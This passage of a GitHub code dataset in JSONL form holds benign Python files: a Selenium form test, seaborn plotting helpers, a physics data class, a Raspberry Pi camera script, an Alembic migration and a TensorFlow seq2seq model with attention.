'input[name=\"lastname\"][required=\"\"]')\n input2.send_keys(\"Petrov\")\n input3 = browser.find_element(By.CSS_SELECTOR, 'input[name=\"email\"][required=\"\"]')\n input3.send_keys(\"asd@gmail.com\")\n \n current_dir = os.path.abspath(os.path.dirname(__file__)) # получаем путь к директории текущего исполняемого файла \n file_path = os.path.join(current_dir, 'file.txt') # добавляем к этому пути имя файла \n element = browser.find_element(By.ID, \"file\")\n # element.send_keys(file_path)\n \n button = browser.find_element(By.CSS_SELECTOR, \"button.btn\") \n button.click()\n \n time.sleep(2)\n\n # находим элемент, содержащий текст\n welcome_text_elt = browser.find_element(By.TAG_NAME, \"h1\")\n # записываем в переменную welcome_text текст из элемента welcome_text_elt\n welcome_text = welcome_text_elt.text\n\n # с помощью assert проверяем, что ожидаемый текст совпадает с текстом на странице сайта\n assert \"Congratulations! You have successfully registered!\" == welcome_text\n \nfinally:\n # успеваем скопировать код за 30 секунд\n time.sleep(4)\n # закрываем браузер после всех манипуляций\n browser.quit()", "repo_name": "inha1e/stepik_auto", "sub_path": "lesson6_step10.py", "file_name": "lesson6_step10.py", "file_ext": "py", "file_size_in_byte": 1832, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "selenium.webdriver.Chrome", "line_number": 10, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 10, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 13, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 13, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 15, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 15, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 17, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 17, "usage_type": "name"}, {"api_name": "os.path.abspath", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By.ID", "line_number": 22, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 22, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 25, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 25, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 28, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.TAG_NAME", "line_number": 31, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 31, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "11117481134", "text": "import pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\ndef plotar (titulo, labelx, labely, x, y, dataset):\n sns.set_palette('Accent')\n sns.set_style('darkgrid')\n ax = sns.lineplot(x=x, y=y, data=dataset)\n ax.figure.set_size_inches(12,6)\n ax.set_title(titulo, loc='left', fontsize=18)\n ax.set_xlabel(labelx, fontsize=14)\n ax.set_ylabel(labely, fontsize=14)\n ax = ax\n plt.show()\n\ndef plot_comparacao(x, y1, y2, y3, dataset, titulo):\n #para plotar mais q um grafico na mesma func\n plt.figure(figsize=(16,12))\n ax = plt.subplot(3,1,1)\n ax.set_title(titulo,fontsize=18, loc='left')\n sns.lineplot(x=x, y=y1, data=dataset)\n plt.subplot(3,1,2)\n sns.lineplot(x=x, y=y2, data=dataset)\n plt.subplot(3,1,3)\n sns.lineplot(x=x, y=y3, data=dataset)\n ax=ax\n", "repo_name": "mascDriver/data-science", "sub_path": "python/plotar_func.py", "file_name": "plotar_func.py", "file_ext": "py", "file_size_in_byte": 818, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "seaborn.set_palette", "line_number": 6, "usage_type": "call"}, {"api_name": "seaborn.set_style", "line_number": 7, "usage_type": "call"}, {"api_name": "seaborn.lineplot", "line_number": 8, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "43417459638", "text": "import numpy as np\nimport mendeleev\nimport sympy\n\nfrom Var import Var\n\nmendeleev.H.isotopes[1].vdw_radius = 50.0\nmendeleev.H.isotopes[2].vdw_radius = 40.0\nmendeleev.H.isotopes[2].atomic_mass = 3.016\n\n\nclass Element:\n planck = 6.62607004e-34\n amu = 1.66054e-27\n density_data = list(np.power(10, Var.domain))\n planck_data = [planck] * len(Var.domain)\n\n def __init__(self, element_name):\n self.name = element_name\n if element_name == 'D':\n self.element = mendeleev.H.isotopes[1]\n self.element.vdw_radius = 50.0\n elif element_name == 'T':\n self.element = mendeleev.H.isotopes[2]\n self.element.vdw_radius = 40.0\n self.element.mass = 3.016\n else:\n self.element = getattr(mendeleev, element_name)\n self.atomic_radius, self.mass = self.element.vdw_radius, self.element.mass * Element.amu\n\n self.atomic_radius_data = [self.atomic_radius] * len(Var.domain)\n self.mass_data = [self.mass] * len(Var.domain)\n self.z_data = [self.element.atomic_number] * len(Var.domain)\n\n self.bulk_data = list(map(Var(np.loadtxt(f'Elements/{self.name}/Bulk_Test_{self.name}.dat')), np.power(10, Var.domain)))\n self.bulk_prime_data = list(map(Var(np.loadtxt(f'Elements/{self.name}/BulkPrime_Test_{self.name}.dat')), np.power(10, Var.domain)))\n self.pressure_data = list(map(Var(np.loadtxt(f'Purg Data/{self.name}.purgv157_rho_Pcgs.dat.fix')), np.power(10, Var.domain)))\n assert len(self.pressure_data) > 10, 'No data read'\n try:\n self.tf_data = list(map(Var(np.loadtxt(f'TF Data/{self.name}_TFCC_rhoPccgs.dat')), np.power(10, Var.domain)))\n except OSError:\n pass\n\n def __getitem__(self, var):\n if var == sympy.symbols('B'):\n return self.bulk_data\n elif var == sympy.symbols('Bp'):\n return self.bulk_prime_data\n elif var == sympy.symbols('P'):\n return self.pressure_data\n elif var == sympy.symbols('rho'):\n return Element.density_data\n elif var == sympy.symbols('r'):\n return self.atomic_radius_data\n elif var == sympy.symbols('m'):\n return self.mass_data\n elif var == sympy.symbols('h'):\n return Element.planck_data\n elif var == sympy.symbols('z'):\n return self.z_data\n else:\n return None\n", "repo_name": "TrellixVulnTeam/LLNL-EOS-Research_0J4Y", "sub_path": "Curve Fitting/Element.py", "file_name": "Element.py", "file_ext": "py", "file_size_in_byte": 2425, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "mendeleev.H", "line_number": 7, "usage_type": "attribute"}, {"api_name": "mendeleev.H", "line_number": 8, "usage_type": "attribute"}, {"api_name": "mendeleev.H", "line_number": 9, "usage_type": "attribute"}, {"api_name": "numpy.power", "line_number": 15, "usage_type": "call"}, {"api_name": "Var.Var.domain", "line_number": 15, "usage_type": "attribute"}, {"api_name": "Var.Var", "line_number": 15, "usage_type": "name"}, {"api_name": "Var.Var.domain", "line_number": 16, "usage_type": "attribute"}, {"api_name": "Var.Var", "line_number": 16, "usage_type": "name"}, {"api_name": "mendeleev.H", "line_number": 21, "usage_type": "attribute"}, {"api_name": "mendeleev.H", "line_number": 24, "usage_type": "attribute"}, {"api_name": "Var.Var.domain", "line_number": 31, "usage_type": "attribute"}, {"api_name": "Var.Var", "line_number": 31, "usage_type": "name"}, {"api_name": "Var.Var.domain", "line_number": 32, "usage_type": "attribute"}, {"api_name": "Var.Var", "line_number": 32, "usage_type": "name"}, {"api_name": "Var.Var.domain", "line_number": 33, "usage_type": "attribute"}, {"api_name": "Var.Var", "line_number": 33, "usage_type": "name"}, {"api_name": "Var.Var", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 35, "usage_type": "call"}, {"api_name": "Var.Var.domain", "line_number": 35, "usage_type": "attribute"}, {"api_name": "Var.Var", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 36, "usage_type": "call"}, {"api_name": "Var.Var.domain", "line_number": 36, "usage_type": "attribute"}, {"api_name": "Var.Var", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 37, "usage_type": "call"}, {"api_name": "Var.Var.domain", "line_number": 37, "usage_type": "attribute"}, {"api_name": "Var.Var", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 40, "usage_type": "call"}, {"api_name": "Var.Var.domain", "line_number": 40, "usage_type": "attribute"}, {"api_name": "sympy.symbols", "line_number": 45, "usage_type": "call"}, {"api_name": "sympy.symbols", "line_number": 47, "usage_type": "call"}, {"api_name": "sympy.symbols", "line_number": 49, "usage_type": "call"}, {"api_name": "sympy.symbols", "line_number": 51, "usage_type": "call"}, {"api_name": "sympy.symbols", "line_number": 53, "usage_type": "call"}, {"api_name": "sympy.symbols", "line_number": 55, "usage_type": "call"}, {"api_name": "sympy.symbols", "line_number": 57, "usage_type": "call"}, {"api_name": "sympy.symbols", "line_number": 59, "usage_type": "call"}]} +{"seq_id": "41839927967", "text": "import datetime\nimport os.path\nimport sqlite3\nfrom os import mkdir\nfrom picamera import PiCamera\nfrom time import sleep\n\n# Check Storage Location\nstorageLocation = '/home/pi/CameraCaptures/'\nif os.path.exists(storageLocation) != True:\n mkdir(storageLocation)\n\n# Check Database\ndatabaseName = 'CapturedImages.db'\n\ntry: \n database = sqlite3.connect(storageLocation + databaseName)\n cursor = database.cursor()\n cursor.execute('''CREATE TABLE IF NOT EXISTS\n images(id INTEGER PRIMARY KEY, CaptureTime DATETIME, filePath TEXT)''') \n\n database.commit()\n \n # Instantiate a camera instance\n nextPicture = storageLocation + 'test.jpg'\n camera = PiCamera()\n camera.rotation = 180\n sleep(5)\n camera.capture(nextPicture)\n\n #Reference it in the database\n cursor.execute('''INSERT INTO images(CaptureTime, filePath)\n VALUES(?,?)''', (datetime.datetime.now(), nextPicture))\n database.commit()\n\n # Display how many captures we have\n count = cursor.execute('SELECT Count(id) FROM images').fetchone()[0]\n print('We have {0} images', count) \n \nexcept Exception as e:\n database.rollback()\n raise e\nfinally:\n database.close()\n", "repo_name": "jawFrome/MyPiBasedCameraTrap", "sub_path": "cameraControl.py", "file_name": "cameraControl.py", "file_ext": "py", "file_size_in_byte": 1217, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.path.exists", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 10, "usage_type": "name"}, {"api_name": "os.mkdir", "line_number": 11, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 17, "usage_type": "call"}, {"api_name": "picamera.PiCamera", "line_number": 26, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 33, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 33, "usage_type": "attribute"}]} +{"seq_id": "70913143235", "text": "\"\"\"empty message\n\nRevision ID: e62028b04d70\nRevises: 9852331b1daf\nCreate Date: 2021-07-29 21:49:33.240411\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'e62028b04d70'\ndown_revision = '9852331b1daf'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_foreign_key(None, 'bugs', 'users', ['user_id'], ['id'])\n op.create_foreign_key(None, 'bugs', 'groups', ['group_id'], ['id'])\n op.create_foreign_key(None, 'users', 'groups', ['group_id'], ['id'])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, 'users', type_='foreignkey')\n op.drop_constraint(None, 'bugs', type_='foreignkey')\n op.drop_constraint(None, 'bugs', type_='foreignkey')\n # ### end Alembic commands ###\n", "repo_name": "goosey-goose/CAPSTONE-PROJECT", "sub_path": "migrations/versions/20210729_214933_.py", "file_name": "20210729_214933_.py", "file_ext": "py", "file_size_in_byte": 922, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "alembic.op.create_foreign_key", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "alembic.op.create_foreign_key", "line_number": 22, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 22, "usage_type": "name"}, {"api_name": "alembic.op.create_foreign_key", "line_number": 23, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 23, "usage_type": "name"}, {"api_name": "alembic.op.drop_constraint", "line_number": 29, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 29, "usage_type": "name"}, {"api_name": "alembic.op.drop_constraint", "line_number": 30, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 30, "usage_type": "name"}, {"api_name": "alembic.op.drop_constraint", "line_number": 31, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 31, "usage_type": "name"}]} +{"seq_id": "3150109950", "text": "#!/usr/bin/env python\nimport time\nimport tensorflow as tf\nimport numpy as np\nimport tensorflow_addons as tfa\nimport os\n\n\nclass SeqHParams:\n def __init__(self,\n train_file: str,\n target_file: str,\n train_vocab: str,\n target_vocab: str,\n sos: str,\n eos: str,\n **kwargs):\n self.name = kwargs.get(\"name\", \"seq2seq-model\")\n self.train_file = train_file\n self.train_vocab = train_vocab\n self.target_file = target_file\n self.target_vocab = target_vocab\n self.sos = sos\n self.eos = eos\n\n self.batch_size = kwargs.get(\"batch_size\", 64)\n self.embedding_size = kwargs.get(\"embedding_size\", 128)\n self.rnn_units = kwargs.get(\"rnn_units\", 128)\n\n self.encoder_cell = kwargs.get(\"encoder_cell_type\", \"lstm\")\n self.encoder_embedding_dropout = kwargs.get(\"encoder_embedding_dropout\", 0.0)\n self.encoder_rnn_dropout = kwargs.get(\"encoder_rnn_dropout\", 0.0)\n self.encoder_activation = kwargs.get(\"encoder_activation\", \"sigmoid\")\n\n self.decoder_cell = kwargs.get(\"decoder_cell_type\", \"lstm\")\n self.decoder_embedding_dropout = kwargs.get(\"decoder_embedding_dropout\", 0.0)\n self.decoder_rnn_dropout = kwargs.get(\"decoder_rnn_dropout\", 0.0)\n self.decoder_activation = kwargs.get(\"decoder_activation\", \"sigmoid\")\n\n self.attention_units = kwargs.get(\"attention_units\", 128)\n self.attention = kwargs.get(\"attention\", \"bahdanau\")\n self.attention_normalized = kwargs.get(\"attention_normalized\", False)\n\n self.optimizer = kwargs.get(\"optimizer\", 'adam')\n self.learning_rate = kwargs.get(\"learning_rate\", 0.001)\n\n self.log_destination = kwargs.get(\"log_destination\", None)\n\n def update(self, dict_, **kwargs):\n kwargs.update(dict_)\n for i, k in enumerate(kwargs):\n setattr(self, k, kwargs[k])\n\n\nclass SequenceModel:\n def __init__(self, hparams):\n self.hparams = hparams\n with tf.io.gfile.GFile(self.hparams.train_file) as io:\n self.train_dataset = io.readlines()\n\n with tf.io.gfile.GFile(self.hparams.target_file) as io:\n self.target_dataset = io.readlines()\n\n self.train_dataset = [\n \"{} {} {}\".format(self.hparams.sos, i.strip(), self.hparams.eos) for i in self.train_dataset]\n self.target_dataset = [\n \"{} {} {}\".format(self.hparams.sos, i.strip(), self.hparams.eos) for i in self.target_dataset]\n\n with tf.io.gfile.GFile(self.hparams.train_vocab) as io:\n self.train_vocab_lookup = io.read().strip().split()\n with tf.io.gfile.GFile(self.hparams.target_vocab) as io:\n self.target_vocab_lookup = io.read().strip().split()\n\n self.train_tokenized_seq, self.train_tokenizer = SequenceModel.tokenize(self.train_dataset,\n self.train_vocab_lookup)\n self.target_tokenized_seq, self.target_tokenizer = SequenceModel.tokenize(self.target_dataset,\n self.target_vocab_lookup)\n\n self.train_max_vocab_len = SequenceModel.max_len(self.train_tokenized_seq)\n self.target_max_vocab_len = SequenceModel.max_len(self.target_tokenized_seq)\n\n self.train_vocab_size = len(self.train_tokenizer.word_index) + 1 # add 1 for 0 sequence character\n self.target_vocab_size = len(self.target_tokenizer.word_index) + 1\n\n self.buffer_size = len(self.train_tokenized_seq)\n self.steps = self.buffer_size // self.hparams.batch_size\n\n self.dataset = (tf.data\n .Dataset\n .from_tensor_slices((self.train_tokenized_seq, self.target_tokenized_seq))\n .shuffle(len(self.train_dataset))\n .batch(self.hparams.batch_size, drop_remainder=True))\n\n self.encoder = Encoder(self.train_vocab_size,\n self.hparams.embedding_size,\n self.hparams.rnn_units,\n rnn_dropout=self.hparams.encoder_rnn_dropout,\n rnn_cell_type=self.hparams.encoder_cell,\n rnn_activation=self.hparams.encoder_activation)\n\n self.decoder = Decoder(self.target_vocab_size,\n self.hparams.embedding_size,\n self.hparams.attention_units,\n self.hparams.rnn_units,\n self.hparams.batch_size,\n attention_type=self.hparams.attention,\n rnn_dropout=self.hparams.decoder_rnn_dropout,\n rnn_cell_type=self.hparams.decoder_cell,\n rnn_activation=self.hparams.decoder_activation)\n\n if self.hparams.optimizer == 'adam':\n self.optimizer = tf.keras.optimizers.Adam(lr=self.hparams.learning_rate)\n elif self.hparams.optimizer == 'rmsprop':\n self.optimizer = tf.keras.optimizers.RMSprop(lr=self.hparams.learning_rate)\n elif self.hparams.optimizer == 'sgd':\n self.optimizer = tf.keras.optimizers.SGD(lr=self.hparams.learning_rate)\n else:\n raise ValueError(\"Optimizer type not understood\", self.hparams.optimizer)\n\n def print_attr(self):\n for i, k in enumerate(self.__dict__):\n print(k, self.__dict__[k])\n\n @staticmethod\n def tokenize(d, lookup):\n tokenizer = tf.keras.preprocessing.text.Tokenizer(filters='', lower=False)\n tokenizer.fit_on_texts(lookup)\n sequences = tokenizer.texts_to_sequences(d)\n\n sequences = tf.keras.preprocessing.sequence.pad_sequences(sequences, padding='post')\n return sequences, tokenizer\n\n @staticmethod\n def max_len(tensor):\n return max(len(t) for t in tensor)\n\n @staticmethod\n def loss_function(y_pred,\n y,\n sse=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction='none')):\n loss = sse(y_true=y, y_pred=y_pred)\n mask = tf.logical_not(tf.math.equal(y, 0)) # output 0 for y=0 else output 1\n mask = tf.cast(mask, dtype=loss.dtype)\n loss = mask * loss\n loss = tf.reduce_mean(loss)\n return loss\n\n def initialize_initial_state(self, bs):\n return [tf.zeros((bs, self.hparams.rnn_units)), tf.zeros((bs, self.hparams.rnn_units))]\n\n @tf.function\n def train_step(self, input_batch, output_batch, encoder_initial_cell_state):\n with tf.GradientTape() as tape:\n encoder_emb_inp = self.encoder.encoder_embedding(input_batch)\n a, a_tx, c_tx = self.encoder.encoder_rnnlayer(encoder_emb_inp,\n initial_state=encoder_initial_cell_state)\n\n decoder_input = output_batch[:, :-1] # ignore \n decoder_output = output_batch[:, 1:] # ignore \n\n decoder_emb_inp = self.decoder.decoder_embedding(decoder_input)\n\n self.decoder.attention_mechanism.setup_memory(a)\n decoder_initial_state = self.decoder.build_decoder_initial_state(self.hparams.batch_size,\n encoder_state=[a_tx, c_tx],\n dtype=tf.float32)\n\n outputs, _, _ = self.decoder.decoder(decoder_emb_inp,\n initial_state=decoder_initial_state,\n sequence_length=self.hparams.batch_size * [\n self.target_max_vocab_len - 1])\n\n logits = outputs.rnn_output\n pred = tf.cast(tf.math.argmax(logits, axis=2), tf.int64)\n actu = tf.cast(decoder_output, tf.int64)\n accuracy = tf.math.count_nonzero(actu == pred) / (actu.shape[0] * actu.shape[1])\n loss = SequenceModel.loss_function(logits, decoder_output)\n\n variables = self.encoder.trainable_variables + self.decoder.trainable_variables\n gradients = tape.gradient(loss, variables)\n\n grads_and_vars = zip(gradients, variables)\n self.optimizer.apply_gradients(grads_and_vars)\n return loss, accuracy\n\n def train(self, epochs, verbose=True):\n if verbose:\n def _print(*args, color=None, **kwargs):\n if color == 'red':\n print('\\033[31m', end='')\n elif color == 'green':\n print('\\033[32m', end='')\n print(*args, '\\033[0m', **kwargs)\n\n else:\n def _print(*args, **kwargs):\n return\n\n def red(text, formatting=\"\"):\n return (\"\\033[31m{\" + formatting + \"}\\033[0m\").format(text)\n\n def green(text, formatting=\"\"):\n return (\"\\033[32m{\" + formatting + \"}\\033[0m\").format(text)\n\n def yellow(text, formatting=\"\"):\n return (\"\\033[33m{\" + formatting + \"}\\033[0m\").format(text)\n\n best_acc = prev_acc = prev_loss = 0\n best_loss = np.inf\n _print(\"Training for {} epochs\".format(epochs))\n total_batches = self.steps\n for i in range(1, epochs + 1):\n start = time.time()\n encoder_state = self.initialize_initial_state(self.hparams.batch_size)\n total_loss = total_accuracy = 0.0\n batch = 0\n for (batch, (input_batch, output_batch)) in enumerate(self.dataset.take(self.steps)):\n batch += 1\n batch_loss, batch_accuracy = self.train_step(input_batch, output_batch, encoder_state)\n total_loss += batch_loss\n total_accuracy += batch_accuracy\n _print(\"\\rEpoch {} Batch {}/{}\"\n \" [loss: {:0.04f}, accuracy: {:0.04f}, time: {:0.02f}s]\".format(i,\n batch,\n total_batches,\n total_loss / batch,\n total_accuracy / batch,\n time.time() - start\n ), end='')\n total_accuracy /= total_batches\n total_loss /= total_batches\n _print(\"\\n========================================\")\n _print(\" | Previous | Last | Best |\")\n _print(\"----------|----------|--------|--------|\")\n if best_acc < total_accuracy:\n best_acc = total_accuracy\n _print(\" Accuracy | {:0.04f} | {} | {} |\".format(prev_acc,\n green(total_accuracy, \":0.04f\"),\n yellow(best_acc, \":0.04f\")))\n else:\n _print(\" Accuracy | {:0.04f} | {} | {} |\".format(prev_acc,\n red(total_accuracy, \":0.04f\"),\n yellow(best_acc, \":0.04f\")))\n _print(\"----------|----------|--------|--------|\")\n\n if best_loss > total_loss:\n best_loss = total_loss\n _print(\" Loss | {:0.04f} | {} | {} |\".format(prev_loss,\n green(total_loss, \":0.04f\"),\n yellow(best_loss, \":0.04f\")))\n else:\n _print(\" Loss | {:0.04f} | {} | {} |\".format(prev_loss,\n red(total_loss, \":0.04f\"),\n yellow(best_loss, \":0.04f\")))\n _print(\"----------|----------|--------|--------|\")\n completion = (time.time() - start) * (epochs - i)\n _print(\"Expected duration of completion: {:0.02f} more seconds\".format(completion))\n prev_acc = total_accuracy\n prev_loss = total_loss\n self.logger(i, total_loss, total_accuracy)\n\n @tf.function\n def infer_one(self, untokenized_sequence: list, beam_width: int):\n input_batch = tf.convert_to_tensor(self.target_tokenizer.texts_to_sequences([untokenized_sequence]))\n encoder_initial_cell_state = self.initialize_initial_state(1)\n encoder_emb_inp = self.encoder.encoder_embedding(input_batch)\n a, a_tx, c_tx = self.encoder.encoder_rnnlayer(encoder_emb_inp,\n initial_state=encoder_initial_cell_state)\n\n decoder_input = tf.expand_dims([self.target_tokenizer.word_index[self.hparams.sos]] * 1, 1)\n self.decoder.decoder_embedding(decoder_input)\n\n # Build from attention\n encoder_memory = tfa.seq2seq.tile_batch(a, beam_width)\n self.decoder.attention_mechanism.setup_memory(encoder_memory)\n\n # Build decoder state from encoder last state\n decoder_initial_state = self.decoder.rnn_cell.get_initial_state(batch_size=1 * beam_width,\n dtype=tf.float32)\n encoder_state = tfa.seq2seq.tile_batch([a_tx, c_tx], multiplier=beam_width)\n decoder_initial_state = decoder_initial_state.clone(cell_state=encoder_state)\n\n decoder_instance = tfa.seq2seq.BeamSearchDecoder(self.decoder.rnn_cell,\n beam_width=beam_width,\n output_layer=self.decoder.dense_layer)\n\n maximum_iterations = tf.round(tf.reduce_max(self.target_max_vocab_len) * tf.constant(2))\n\n decoder_embedding_matrix = self.decoder.decoder_embedding.variables[0]\n start_tokens = tf.fill([1], self.target_tokenizer.word_index[self.hparams.sos])\n end_token = self.target_tokenizer.word_index[self.hparams.eos]\n\n (first_finished, first_inputs, first_state) = decoder_instance.initialize(decoder_embedding_matrix,\n start_tokens=start_tokens,\n end_token=end_token,\n initial_state=decoder_initial_state)\n inputs = first_inputs\n state = first_state\n predictions = np.empty((1, beam_width, 0), dtype=np.int32)\n beam_scores = np.empty((1, beam_width, 0), dtype=np.float32)\n for j in range(maximum_iterations):\n beam_search_outputs, next_state, next_inputs, finished = decoder_instance.step(j, inputs, state)\n inputs = next_inputs\n state = next_state\n outputs = np.expand_dims(beam_search_outputs.predicted_ids, axis=-1)\n scores = np.expand_dims(beam_search_outputs.scores, axis=-1)\n predictions = np.append(predictions, outputs, axis=-1)\n beam_scores = np.append(beam_scores, scores, axis=-1)\n\n return self.target_tokenizer.sequences_to_texts(predictions[0]), tf.math.reduce_max(beam_scores[0], 1).numpy()\n\n def logger(self, epoch, loss, accuracy):\n if self.hparams.log_destination:\n with open(self.hparams.log_destination, 'a') as io:\n io.write(\"{},{},{}\\n\".format(epoch, loss, accuracy))\n\n def save_model(self, destination):\n try:\n os.mkdir(destination)\n except FileExistsError as e:\n pass\n destination = os.path.join(destination, self.hparams.name)\n self.encoder.save_weights(destination + \".encoder\")\n self.decoder.save_weights(destination + \".decoder\")\n\n def load_model(self, source):\n source = os.path.join(source, self.hparams.name)\n self.encoder.load_weights(source + \".encoder\")\n self.decoder.load_weights(source + \".decoder\")\n\n\nclass Encoder(tf.keras.Model):\n def __init__(self,\n vocab_size,\n embedding_size,\n rnn_units,\n rnn_dropout=0.0,\n rnn_cell_type='lstm',\n rnn_activation='tanh'):\n super().__init__()\n self.encoder_embedding = tf.keras.layers.Embedding(input_dim=vocab_size,\n output_dim=embedding_size)\n if rnn_cell_type == 'lstm':\n self.encoder_rnnlayer = tf.keras.layers.LSTM(rnn_units,\n return_sequences=True,\n return_state=True,\n dropout=rnn_dropout,\n activation=rnn_activation)\n elif rnn_cell_type == 'gru':\n self.encoder_rnnlayer = tf.keras.layers.GRU(rnn_units,\n return_sequences=True,\n return_state=True,\n dropout=rnn_dropout,\n activation=rnn_activation)\n else:\n raise ValueError('Cell type unsupported:', rnn_cell_type)\n\n\nclass Decoder(tf.keras.Model):\n def __init__(self,\n vocab_size,\n embedding_size,\n dense_units,\n rnn_units,\n batch_size,\n attention_type='bahdanau',\n rnn_dropout=0.0,\n rnn_cell_type='lstm',\n rnn_activation='tanh'):\n super().__init__()\n self.decoder_embedding = tf.keras.layers.Embedding(input_dim=vocab_size,\n output_dim=embedding_size)\n\n self.dense_layer = tf.keras.layers.Dense(vocab_size)\n\n if rnn_cell_type == 'lstm':\n self.decoder_rnncell = tf.keras.layers.LSTMCell(rnn_units,\n activation=rnn_activation,\n dropout=rnn_dropout)\n elif rnn_cell_type == 'gru':\n self.decoder_rnncell = tf.keras.layers.GRUCell(rnn_units,\n activation=rnn_activation,\n dropout=rnn_dropout)\n else:\n raise ValueError('Cell type unsupported:', rnn_cell_type)\n\n self.dense_units = dense_units\n # Sampler\n self.sampler = tfa.seq2seq.sampler.TrainingSampler()\n\n # Create attention mechanism with memory = None\n self.attention_mechanism = self.build_attention_mechanism(attention_type,\n None,\n batch_size * [vocab_size])\n self.rnn_cell = self.build_rnn_cell()\n self.decoder = tfa.seq2seq.BasicDecoder(self.rnn_cell,\n sampler=self.sampler,\n output_layer=self.dense_layer)\n\n def build_attention_mechanism(self, attention_type, memory, memory_sequence_length):\n if attention_type == 'luong':\n return tfa.seq2seq.LuongAttention(self.dense_units,\n memory=memory,\n memory_sequence_length=memory_sequence_length)\n elif attention_type == 'bahdanau':\n return tfa.seq2seq.BahdanauAttention(self.dense_units,\n memory=memory,\n memory_sequence_length=memory_sequence_length)\n\n # wrap decodernn cell\n def build_rnn_cell(self):\n rnn_cell = tfa.seq2seq.AttentionWrapper(self.decoder_rnncell,\n self.attention_mechanism,\n attention_layer_size=self.dense_units)\n return rnn_cell\n\n def build_decoder_initial_state(self, batch_size, encoder_state, dtype):\n decoder_initial_state = self.rnn_cell.get_initial_state(batch_size=batch_size,\n dtype=dtype)\n decoder_initial_state = decoder_initial_state.clone(cell_state=encoder_state)\n return decoder_initial_state\n", "repo_name": "ye-yu/cac-svs", "sub_path": "seq2seq_qi/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 21154, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "tensorflow.io.gfile.GFile", "line_number": 58, "usage_type": "call"}, {"api_name": "tensorflow.io", "line_number": 58, "usage_type": 